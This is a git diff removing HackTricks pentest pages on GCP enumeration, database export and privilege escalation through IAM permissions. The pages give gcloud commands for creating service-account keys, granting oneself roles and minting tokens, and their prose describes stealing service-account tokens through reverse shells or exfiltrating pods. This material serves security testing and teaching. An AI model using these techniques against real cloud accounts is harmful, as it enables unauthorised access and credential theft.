url="gcp-local-privilege-escalation-ssh-pivoting.md" %} -[gcp-local-privilege-escalation-ssh-pivoting.md](gcp-local-privilege-escalation-ssh-pivoting.md) -{% endcontent-ref %} - -# Images - -## Custom Images - -**Custom compute images may contain sensitive details** or other vulnerable configurations that you can exploit. 
You can query the list of non-standard images in a project with the following command: - -``` -gcloud compute images list --no-standard-images -``` - -You can then [**export**](https://cloud.google.com/sdk/gcloud/reference/compute/images/export) **the virtual disks** from any image in multiple formats. The following command would export the image `test-image` in qcow2 format, allowing you to download the file and build a VM locally for further investigation: - -```bash -gcloud compute images export --image test-image \ - --export-format qcow2 --destination-uri [BUCKET] - -# Execute container inside a docker -docker run --rm -ti gcr.io//secret:v1 sh -``` - -More generic enumeration: - -```bash -gcloud compute images list -gcloud compute images list --project windows-cloud --no-standard-images #non-Shielded VM Windows Server images -gcloud compute images list --project gce-uefi-images --no-standard-images #available Shielded VM images, including Windows images -``` - -## Custom Instance Templates - -An [instance template](https://cloud.google.com/compute/docs/instance-templates/) defines instance properties to help deploy consistent configurations. These may contain the same types of sensitive data as a running instance's custom metadata. 
You can use the following commands to investigate: - -```bash -# List the available templates -$ gcloud compute instance-templates list - -# Get the details of a specific template -$ gcloud compute instance-templates describe [TEMPLATE NAME] -``` - -# More Enumeration - -| Description | Command | -| ---------------------- | --------------------------------------------------------------------------------------------------------- | -| **Stop** an instance | `gcloud compute instances stop instance-2` | -| **Start** an instance | `gcloud compute instances start instance-2` | -| **Create** an instance | `gcloud compute instances create vm1 --image image-1 --tags test --zone "" --machine-type f1-micro` | -| **Download** files | `gcloud compute copy-files example-instance:~/REMOTE-DIR ~/LOCAL-DIR --zone us-central1-a` | -| **Upload** files | `gcloud compute copy-files ~/LOCAL-FILE-1 example-instance:~/REMOTE-DIR --zone us-central1-a` | -| List all **disks** | `gcloud compute disks list` | -| List all disk types | `gcloud compute disk-types list` | -| List all **snapshots** | `gcloud compute snapshots list` | -| **Create** snapshot | `gcloud compute disks snapshot --snapshotname --zone $zone` | - - -
- -Support HackTricks and get benefits! - -- Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! - -- Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) - -- Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) - -- **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** - -- **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.** - -
- - diff --git a/cloud-security/gcp-security/gcp-databases-enumeration.md b/cloud-security/gcp-security/gcp-databases-enumeration.md deleted file mode 100644 index 6a417ad8c..000000000 --- a/cloud-security/gcp-security/gcp-databases-enumeration.md +++ /dev/null @@ -1,129 +0,0 @@ - - -
- -Support HackTricks and get benefits! - -- Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! - -- Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) - -- Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) - -- **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** - -- **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.** - -
- - -Google has [a handful of database technologies](https://cloud.google.com/products/databases/) that you may have access to via the default service account or another set of credentials you have compromised thus far. - -Databases will usually contain interesting information, so it is highly recommended to check them. Each database type provides various **`gcloud` commands to export the data**. This typically involves **writing the database to a cloud storage bucket first**, which you can then download. It may be best to use an existing bucket you already have access to, but you can also create your own if you want. - -As an example, you can follow [Google's documentation](https://cloud.google.com/sql/docs/mysql/import-export/exporting) to exfiltrate a Cloud SQL database. - -## [Cloud SQL](https://cloud.google.com/sdk/gcloud/reference/sql/) - -Cloud SQL instances are **fully managed, relational MySQL, PostgreSQL and SQL Server databases**. Google handles replication, patch management and database management to ensure availability and performance. [Learn more](https://cloud.google.com/sql/docs/) - -If you find any of these instances in use, you could try to **access them from the internet** as they might be misconfigured and accessible. - -```bash -# Cloud SQL -gcloud sql instances list -gcloud sql databases list --instance [INSTANCE] -gcloud sql backups list --instance [INSTANCE] -gcloud sql export sql gs:///cloudsql/export.sql.gz --database -``` - -## [Cloud Spanner](https://cloud.google.com/sdk/gcloud/reference/spanner/) - -Fully managed relational database with unlimited scale, strong consistency, and up to 99.999% availability. 
- -```bash -# Cloud Spanner -gcloud spanner instances list -gcloud spanner databases list --instance [INSTANCE] -gcloud spanner backups list --instance [INSTANCE] -``` - -## [Cloud Bigtable](https://cloud.google.com/sdk/gcloud/reference/bigtable/) - -A fully managed, scalable NoSQL database service for large analytical and operational workloads with up to 99.999% availability. [Learn more](https://cloud.google.com/bigtable). - -```bash -# Cloud Bigtable -gcloud bigtable instances list -gcloud bigtable clusters list -gcloud bigtable backups list --instance [INSTANCE] -``` - -## [Cloud Firestore](https://cloud.google.com/sdk/gcloud/reference/firestore/) - -Cloud Firestore is a flexible, scalable database for mobile, web, and server development from Firebase and Google Cloud. Like Firebase Realtime Database, it keeps your data in sync across client apps through realtime listeners and offers offline support for mobile and web so you can build responsive apps that work regardless of network latency or Internet connectivity. Cloud Firestore also offers seamless integration with other Firebase and Google Cloud products, including Cloud Functions. [Learn more](https://firebase.google.com/docs/firestore). - -``` -gcloud firestore indexes composite list -gcloud firestore indexes fields list -gcloud firestore export gs://my-source-project-export/export-20190113_2109 --collection-ids='cameras','radios' -``` - -## [Firebase](https://cloud.google.com/sdk/gcloud/reference/firebase/) - -The Firebase Realtime Database is a cloud-hosted NoSQL database that lets you store and sync data between your users in realtime. [Learn more](https://firebase.google.com/products/realtime-database/). - -## Memorystore - -Reduce latency with scalable, secure, and highly available in-memory service for [**Redis**](https://cloud.google.com/sdk/gcloud/reference/redis) and [**Memcached**](https://cloud.google.com/sdk/gcloud/reference/memcache). Learn more. 
- -```bash -gcloud memcache instances list --region [region] -# You should try to connect to the memcache instances to access the data - -gcloud redis instances list --region [region] -gcloud redis instances export gs://my-bucket/my-redis-instance.rdb my-redis-instance --region=us-central1 -``` - -## [Bigquery](https://cloud.google.com/bigquery/docs/bq-command-line-tool) - -BigQuery is a fully-managed enterprise data warehouse that helps you manage and analyze your data with built-in features like machine learning, geospatial analysis, and business intelligence. BigQuery’s serverless architecture lets you use SQL queries to answer your organization’s biggest questions with zero infrastructure management. BigQuery’s scalable, distributed analysis engine lets you query terabytes in seconds and petabytes in minutes. [Learn more](https://cloud.google.com/bigquery/docs/introduction). - -```bash -bq ls -p #List projects -bq ls -a #List all datasets -bq ls #List datasets from current project -bq ls #List tables inside the DB - -# Show information -bq show ":" -bq show ":." -bq show --encryption_service_account - -bq query '' #Query inside the dataset - -# Dump the table or dataset -bq extract ds.table gs://mybucket/table.csv -bq extract -m ds.model gs://mybucket/model -``` - -BigQuery SQL Injection: [https://ozguralp.medium.com/bigquery-sql-injection-cheat-sheet-65ad70e11eac](https://ozguralp.medium.com/bigquery-sql-injection-cheat-sheet-65ad70e11eac) - - -
- -Support HackTricks and get benefits! - -- Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! - -- Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) - -- Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) - -- **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** - -- **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.** - -
- - diff --git a/cloud-security/gcp-security/gcp-interesting-permissions/README.md b/cloud-security/gcp-security/gcp-interesting-permissions/README.md deleted file mode 100644 index abc9b2d0b..000000000 --- a/cloud-security/gcp-security/gcp-interesting-permissions/README.md +++ /dev/null @@ -1,77 +0,0 @@ - - -
- -Support HackTricks and get benefits! - -- Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! - -- Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) - -- Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) - -- **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** - -- **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.** - -
- - -# Introduction to GCP Privilege Escalation - -GCP, as any other cloud, has some **principals**: users, groups and service accounts, and some **resources** like compute engine, cloud functions…\ -Then, via roles, **permissions are granted to those principals over the resources**. This is the way to specify the permissions a principal has over a resource in GCP.\ -There are certain permissions that will allow a user to **get even more permissions** on the resource or third party resources, and that’s what is called **privilege escalation** (also, the exploitation of vulnerabilities to get more permissions). - -Therefore, I would like to separate GCP privilege escalation techniques in **2 groups**: - -* **Privesc to a principal**: This will allow you to **impersonate another principal**, and therefore act like it with all its permissions. e.g.: Abuse _getAccessToken_ to impersonate a service account. -* **Privesc on the resource**: This will allow you to **get more permissions over the specific resource**. e.g.: you can abuse _setIamPolicy_ permission over cloudfunctions to allow you to trigger the function. - * Note that some **resources permissions will also allow you to attach an arbitrary service account** to the resource. This means that you will be able to launch a resource with a SA, get into the resource, and **steal the SA token**. Therefore, this will allow to escalate to a principal via a resource escalation. This has happened in several resources previously, but now it’s less frequent (but can still happen). - -Obviously, the most interesting privilege escalation techniques are the ones of the **second group** because it will allow you to **get more privileges outside of the resources you already have** some privileges over. However, note that **escalating in resources** may also give you access to **sensitive information** or even to **other principals** (maybe via reading a secret that contains a token of a SA). 
- -{% hint style="warning" %} -It's important to note also that in **GCP Service Accounts are both principals and permissions**, so escalating privileges in a SA will allow you to impersonate it also. -{% endhint %} - -{% hint style="info" %} -The permissions between parenthesis indicate the permissions needed to exploit the vulnerability with `gcloud`. Those might not be needed if exploiting it through the API. -{% endhint %} - -# Privilege Escalation to Principals - -Check all the **known permissions** that will allow you to **escalate privileges over other principals** in: - -{% content-ref url="gcp-privesc-to-other-principals.md" %} -[gcp-privesc-to-other-principals.md](gcp-privesc-to-other-principals.md) -{% endcontent-ref %} - -# Privilege Escalation to Resources - -Check all the **known permissions** that will allow you to **escalate privileges over other resources** in: - -{% content-ref url="gcp-privesc-to-resources.md" %} -[gcp-privesc-to-resources.md](gcp-privesc-to-resources.md) -{% endcontent-ref %} - -# - - -
- -Support HackTricks and get benefits! - -- Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! - -- Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) - -- Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) - -- **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** - -- **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.** - -
- - diff --git a/cloud-security/gcp-security/gcp-interesting-permissions/gcp-privesc-to-other-principals.md b/cloud-security/gcp-security/gcp-interesting-permissions/gcp-privesc-to-other-principals.md deleted file mode 100644 index fc445c892..000000000 --- a/cloud-security/gcp-security/gcp-interesting-permissions/gcp-privesc-to-other-principals.md +++ /dev/null @@ -1,340 +0,0 @@ - - -
- -Support HackTricks and get benefits! - -- Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! - -- Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) - -- Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) - -- **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** - -- **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.** - -
- - -{% hint style="info" %} -GCP has **hundreds of permissions**. This is just a list containing the **known** ones that could allow you to escalate to other principals.\ -If you know about any other permissions not mentioned here, **please send a PR to add it** or let me know and I will add it. -{% endhint %} - -# IAM - -## iam.roles.update (iam.roles.get) - -If you have the mentioned permissions you will be able to update a role assigned to you and give you extra permissions to other resources like: - -```bash -gcloud iam roles update --project --add-permissions -``` - -You can find a script to automate the [**creation, exploit and cleaning of a vuln environment here**](gcp-privesc-to-other-principals.md#deploymentmanager) and a python script to abuse this privilege [**here**](https://github.com/RhinoSecurityLabs/GCP-IAM-Privilege-Escalation/blob/master/ExploitScripts/iam.roles.update.py). For more information check the [**original research**](https://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-platform-part-1/). - -## iam.serviceAccounts.getAccessToken (iam.serviceAccounts.get) - -This permission allows you to **request an access token that belongs to a Service Account**, so it's possible to request an access token of a Service Account with more privileges than ours. - -You can find a script to automate the [**creation, exploit and cleaning of a vuln environment here**](https://github.com/carlospolop/gcp\_privesc\_scripts/blob/main/tests/4-iam.serviceAccounts.getAccessToken.sh) and a python script to abuse this privilege [**here**](https://github.com/RhinoSecurityLabs/GCP-IAM-Privilege-Escalation/blob/master/ExploitScripts/iam.serviceAccounts.getAccessToken.py). For more information check the [**original research**](https://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-platform-part-1/). 
- -## iam.serviceAccountKeys.create - -This permission allows us to do something similar to the previous method, but instead of an access token, we are **creating a user-managed key for a Service Account**, which will allow us to access GCP as that Service Account. - -```bash -gcloud iam service-accounts keys create --iam-account -``` - -You can find a script to automate the [**creation, exploit and cleaning of a vuln environment here**](https://github.com/carlospolop/gcp\_privesc\_scripts/blob/main/tests/3-iam.serviceAccountKeys.create.sh) and a python script to abuse this privilege [**here**](https://github.com/RhinoSecurityLabs/GCP-IAM-Privilege-Escalation/blob/master/ExploitScripts/iam.serviceAccountKeys.create.py). For more information check the [**original research**](https://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-platform-part-1/). - -Note that **iam.serviceAccountKeys.update won't work to modify the key** of a SA because to do that the permissions iam.serviceAccountKeys.create is also needed. - -## iam.serviceAccounts.implicitDelegation - -If you have the _**iam.serviceAccounts.implicitDelegation**_** permission on a Service Account** that has the _**iam.serviceAccounts.getAccessToken**_** permission on a third Service Account**, then you can use implicitDelegation to **create a token for that third Service Account**. Here is a diagram to help explain. - -![](https://rhinosecuritylabs.com/wp-content/uploads/2020/04/image2-500x493.png) - -You can find a script to automate the [**creation, exploit and cleaning of a vuln environment here**](https://github.com/carlospolop/gcp\_privesc\_scripts/blob/main/tests/5-iam.serviceAccounts.implicitDelegation.sh) and a python script to abuse this privilege [**here**](https://github.com/RhinoSecurityLabs/GCP-IAM-Privilege-Escalation/blob/master/ExploitScripts/iam.serviceAccounts.implicitDelegation.py). 
For more information check the [**original research**](https://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-platform-part-1/). - -Note that according to the [**documentation**](https://cloud.google.com/iam/docs/understanding-service-accounts), the delegation only works to generate a token using the [**generateAccessToken()**](https://cloud.google.com/iam/credentials/reference/rest/v1/projects.serviceAccounts/generateAccessToken) method. - -## iam.serviceAccounts.signBlob - -The _iam.serviceAccounts.signBlob_ permission “allows signing of arbitrary payloads” in GCP. This means we can **create an unsigned JWT of the SA and then send it as a blob to get the JWT signed** by the SA we are targeting. For more information [**read this**](https://medium.com/google-cloud/using-serviceaccountactor-iam-role-for-account-impersonation-on-google-cloud-platform-a9e7118480ed). - -You can find a script to automate the [**creation, exploit and cleaning of a vuln environment here**](https://github.com/carlospolop/gcp\_privesc\_scripts/blob/main/tests/6-iam.serviceAccounts.signBlob.sh) and a python script to abuse this privilege [**here**](https://github.com/RhinoSecurityLabs/GCP-IAM-Privilege-Escalation/blob/master/ExploitScripts/iam.serviceAccounts.signBlob-accessToken.py) and [**here**](https://github.com/RhinoSecurityLabs/GCP-IAM-Privilege-Escalation/blob/master/ExploitScripts/iam.serviceAccounts.signBlob-gcsSignedUrl.py). For more information check the [**original research**](https://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-platform-part-1/). - -## iam.serviceAccounts.signJwt - -Similar to how the previous method worked by signing arbitrary payloads, this method works by signing well-formed JSON web tokens (JWTs). The difference with the previous method is that **instead of making Google sign a blob containing a JWT, we use the signJWT method that already expects a JWT**. 
This makes it easier to use but you can only sign JWT instead of any bytes. - -You can find a script to automate the [**creation, exploit and cleaning of a vuln environment here**](https://github.com/carlospolop/gcp\_privesc\_scripts/blob/main/tests/7-iam.serviceAccounts.signJWT.sh) and a python script to abuse this privilege [**here**](https://github.com/RhinoSecurityLabs/GCP-IAM-Privilege-Escalation/blob/master/ExploitScripts/iam.serviceAccounts.signJWT.py). For more information check the [**original research**](https://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-platform-part-1/). - -## iam.serviceAccounts.setIamPolicy - -This permission allows to **add IAM policies to service accounts**. You can abuse it to **grant yourself** the permissions you need to impersonate the service account. In the following example we are granting ourselves the β€œroles/iam.serviceAccountTokenCreator” role over the interesting SA: - -```bash -gcloud iam service-accounts add-iam-policy-binding "${VICTIM_SA}@${PROJECT_ID}.iam.gserviceaccount.com" \ - --member="user:username@domain.com" \ - --role="roles/iam.serviceAccountTokenCreator" -``` - -You can find a script to automate the [**creation, exploit and cleaning of a vuln environment here**](https://github.com/carlospolop/gcp\_privesc\_scripts/blob/main/tests/d-iam.serviceAccounts.setIamPolicy.sh)**.** - -## iam.serviceAccounts.actAs - -This means that as part of creating certain resources, you must β€œactAs” the Service Account for the call to complete successfully. For example, when starting a new Compute Engine instance with an attached Service Account, you need _iam.serviceAccounts.actAs_ on that Service Account. This is because without that permission, users could escalate permissions with fewer permissions to start with. 
- -**There are multiple individual methods that use _iam.serviceAccounts.actAs_, so depending on your own permissions, you may only be able to exploit one (or more) of these methods below**. These methods are slightly different in that they **require multiple permissions to exploit, rather than a single permission** like all of the previous methods. - -## iam.serviceAccounts.getOpenIdToken - -This permission can be used to generate an OpenID JWT. These are used to assert identity and do not necessarily carry any implicit authorization against a resource. - -According to this [**interesting post**](https://medium.com/google-cloud/authenticating-using-google-openid-connect-tokens-e7675051213b), it's necessary to indicate the audience (service where you want to use the token to authenticate to) and you will receive a JWT signed by google indicating the service account and the audience of the JWT. - -You can generate an OpenIDToken (if you have the access) with: - -```bash -# First activate the SA with iam.serviceAccounts.getOpenIdToken over the other SA -gcloud auth activate-service-account --key-file=/path/to/svc_account.json -# Then, generate token -gcloud auth print-identity-token "${ATTACK_SA}@${PROJECT_ID}.iam.gserviceaccount.com" --audiences=https://example.com -``` - -Then you can just use it to access the service with: - -```bash -curl -v -H "Authorization: Bearer id_token" https://some-cloud-run-uc.a.run.app -``` - -Some services that support authentication via this kind of tokens are: - -* [Google Cloud Run](https://cloud.google.com/run/) -* [Google Cloud Functions](https://cloud.google.com/functions/docs/) -* [Google Identity Aware Proxy](https://cloud.google.com/iap/docs/authentication-howto) -* [Google Cloud Endpoints](https://cloud.google.com/endpoints/docs/openapi/authenticating-users-google-id) (if using Google OIDC) - -You can find an example on how to create an OpenID token on behalf of a service account 
[**here**](https://github.com/carlospolop-forks/GCP-IAM-Privilege-Escalation/blob/master/ExploitScripts/iam.serviceAccounts.getOpenIdToken.py). - -# resourcemanager - -## resourcemanager.organizations.setIamPolicy - -Like in the exploitation of [**iam.serviceAccounts.setIamPolicy**](gcp-privesc-to-other-principals.md#iam.serviceaccounts.setiampolicy), this permission allows you to **modify** your **permissions** against **any resource** at **organization** level. So, you can follow the same exploitation example. - -## resourcemanager.folders.setIamPolicy - -Like in the exploitation of [**iam.serviceAccounts.setIamPolicy**](gcp-privesc-to-other-principals.md#iam.serviceaccounts.setiampolicy), this permission allows you to **modify** your **permissions** against **any resource** at **folder** level. So, you can follow the same exploitation example. - -## resourcemanager.projects.setIamPolicy - -Like in the exploitation of [**iam.serviceAccounts.setIamPolicy**](gcp-privesc-to-other-principals.md#iam.serviceaccounts.setiampolicy), this permission allows you to **modify** your **permissions** against **any resource** at **project** level. So, you can follow the same exploitation example. - -# deploymentmanager - -## deploymentmanager.deployments.create - -This single permission lets you **launch new deployments** of resources into GCP with arbitrary service accounts. You could for example launch a compute instance with a SA to escalate to it. - -You could actually **launch any resource** listed in `gcloud deployment-manager types list` - -In the [**original research**](https://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-platform-part-1/) following[ **script**](https://github.com/RhinoSecurityLabs/GCP-IAM-Privilege-Escalation/blob/master/ExploitScripts/deploymentmanager.deployments.create.py) is used to deploy a compute instance, however that script won't work. 
Check a script to automate the [**creation, exploit and cleaning of a vuln environment here**](https://github.com/carlospolop/gcp\_privesc\_scripts/blob/main/tests/1-deploymentmanager.deployments.create.sh)**.** - -## deploymentmanager.deployments.**update** - -This is like the previous abuse but instead of creating a new deployment, you modify an already existing one (so be careful) - -Check a script to automate the [**creation, exploit and cleaning of a vuln environment here**](https://github.com/carlospolop/gcp\_privesc\_scripts/blob/main/tests/e-deploymentmanager.deployments.update.sh)**.** - -## deploymentmanager.deployments.**setIamPolicy** - -This is like the previous abuse but instead of directly creating a new deployment, you first grant yourself that access and then abuse the permission as explained in the previous _deploymentmanager.deployments.create_ section. - -# cloudbuild - -## cloudbuild.builds.create - -With this permission you can **submit a cloud build**. The cloudbuild machine will have in its filesystem by **default a token of the powerful cloudbuild Service Account**: `@cloudbuild.gserviceaccount.com` . However, you can **indicate any service account inside the project** in the cloudbuild configuration.\ -Therefore, you can just make the machine exfiltrate to your server the token or **get a reverse shell inside of it and get yourself the token** (the file containing the token might change). - -You can find the original exploit script [**here on GitHub**](https://github.com/RhinoSecurityLabs/GCP-IAM-Privilege-Escalation/blob/master/ExploitScripts/cloudbuild.builds.create.py) (but the location it's taking the token from didn't work for me). 
Therefore, check a script to automate the [**creation, exploit and cleaning of a vuln environment here**](https://github.com/carlospolop/gcp\_privesc\_scripts/blob/main/tests/f-cloudbuild.builds.create.sh) and a python script to get a reverse shell inside of the cloudbuild machine and [**steal it here**](https://github.com/carlospolop/gcp\_privesc\_scripts/blob/main/tests/f-cloudbuild.builds.create.py) (in the code you can find how to specify other service accounts)**.** - -For a more in-depth explanation visit [https://rhinosecuritylabs.com/gcp/iam-privilege-escalation-gcp-cloudbuild/](https://rhinosecuritylabs.com/gcp/iam-privilege-escalation-gcp-cloudbuild/) - -## cloudbuild.builds.update - -**Potentially** with this permission you will be able to **update a cloud build and just steal the service account token** like it was performed with the previous permission (but unfortunately at the time of this writing I couldn't find any way to call that API). - -# compute - -## compute.projects.setCommonInstanceMetadata - -With that permission you can **modify** the **metadata** information of an **instance** and change the **authorized keys of a user**, or **create** a **new user with sudo** permissions. Therefore, you will be able to exec via SSH into any VM instance and steal the GCP Service Account the Instance is running with.\ -Limitations: - -* Note that GCP Service Accounts running in VM instances by default have a **very limited scope** -* You will need to be **able to contact the SSH** server to login - -For more information about how to exploit this permission check: - -{% content-ref url="../gcp-local-privilege-escalation-ssh-pivoting.md" %} -[gcp-local-privilege-escalation-ssh-pivoting.md](../gcp-local-privilege-escalation-ssh-pivoting.md) -{% endcontent-ref %} - -## compute.instances.setMetadata - -This permission gives the **same privileges as the previous permission** but over a specific instances instead to a whole project. 
The **same exploits and limitations apply**. - -## compute.instances.setIamPolicy - -This kind of permission will allow you to **grant yourself a role with the previous permissions** and escalate privileges abusing them. - -## **compute.instances.osLogin** - -If OSLogin is enabled in the instance, with this permission you can just run **`gcloud compute ssh [INSTANCE]`** and connect to the instance. You won't have root privs inside the instance. - -## **compute.instances.osAdminLogin** - -If OSLogin is enabled in the instance, with this permission you can just run **`gcloud compute ssh [INSTANCE]`** and connect to the instance. You will have root privs inside the instance. - -# container - -## container.clusters.get - -This permission allows to **gather credentials for the Kubernetes cluster** using something like: - -```bash -gcloud container clusters get-credentials --zone -``` - -Without extra permissions, the credentials are pretty basic as you can **just list some resource**, but they are useful to find misconfigurations in the environment. - -{% hint style="info" %} -Note that **kubernetes clusters might be configured to be private**, which will disallow access to the Kube-API server from the Internet. -{% endhint %} - -## container.clusters.getCredentials - -Apparently this permission might be useful to gather auth credentials (basic auth method isn't supported anymore by GKE if you use the latest GKE versions). - -## container.roles.escalate/container.clusterRoles.escalate - -**Kubernetes** by default **prevents** principals from being able to **create** or **update** **Roles** and **ClusterRoles** with **more permissions** than the ones the principal has. However, a **GCP** principal with those permissions will be **able to create/update Roles/ClusterRoles with more permissions** than the ones he held, effectively bypassing the Kubernetes protection against this behaviour. 
- -**container.roles.create** and/or **container.roles.update** OR **container.clusterRoles.create** and/or **container.clusterRoles.update** respectively are also **necessary** to perform those privilege escalation actions.\ - - -## container.roles.bind/container.clusterRoles.bind - -**Kubernetes** by default **prevents** principals from being able to **create** or **update** **RoleBindings** and **ClusterRoleBindings** to give **more permissions** than the ones the principal has. However, a **GCP** principal with those permissions will be **able to create/update RolesBindings/ClusterRolesBindings with more permissions** than the ones he has, effectively bypassing the Kubernetes protection against this behaviour. - -**container.roleBindings.create** and/or **container.roleBindings.update** OR **container.clusterRoleBindings.create** and/or **container.clusterRoleBindings.update** respectively are also **necessary** to perform those privilege escalation actions. - -## container.cronJobs.create, container.cronJobs.update container.daemonSets.create, container.daemonSets.update container.deployments.create, container.deployments.update container.jobs.create, container.jobs.update container.pods.create, container.pods.update container.replicaSets.create, container.replicaSets.update container.replicationControllers.create, container.replicationControllers.update container.scheduledJobs.create, container.scheduledJobs.update container.statefulSets.create, container.statefulSets.update - -All these permissions are going to allow you to **create or update a resource** where you can **define** a **pod**. 
Defining a pod you can **specify the SA** that is going to be **attached** and the **image** that is going to be **run**, therefore you can run an image that is going to **exfiltrate the token of the SA to your server** allowing you to escalate to any service account.\ -For more information check: - -{% content-ref url="../../pentesting-kubernetes/abusing-roles-clusterroles-in-kubernetes/" %} -[abusing-roles-clusterroles-in-kubernetes](../../pentesting-kubernetes/abusing-roles-clusterroles-in-kubernetes/) -{% endcontent-ref %} - -As we are in a GCP environment, you will also be able to **get the nodepool GCP SA** from the **metadata** service and **escalate privileges in GC**P (by default the compute SA is used). - -## container.secrets.get, container.secrets.list - -As [**explained in this page**](../../pentesting-kubernetes/abusing-roles-clusterroles-in-kubernetes/#listing-secrets), with these permissions you can **read** the **tokens** of all the **SAs of kubernetes**, so you can escalate to them. - -## container.pods.exec - -With this permission you will be able to **exec into pods**, which gives you **access** to all the **Kubernetes SAs running in pods** to escalate privileges within K8s, but also you will be able to **steal** the **GCP Service Account** of the **NodePool**, **escalating privileges in GCP**. - -## container.pods.portForward - -As [**explained in this page**](../../pentesting-kubernetes/abusing-roles-clusterroles-in-kubernetes/#port-forward), with these permissions you can **access local services** running in **pods** that might allow you to **escalate privileges in Kubernetes** (and in **GCP** if somehow you manage to talk to the metadata service)**.** - -## container.serviceAccounts.createToken - -Because of the **name** of the **permission**, it **looks like that it will allow you to generate tokens of the K8s Service Accounts**, so you will be able to **privesc to any SA** inside Kubernetes. 
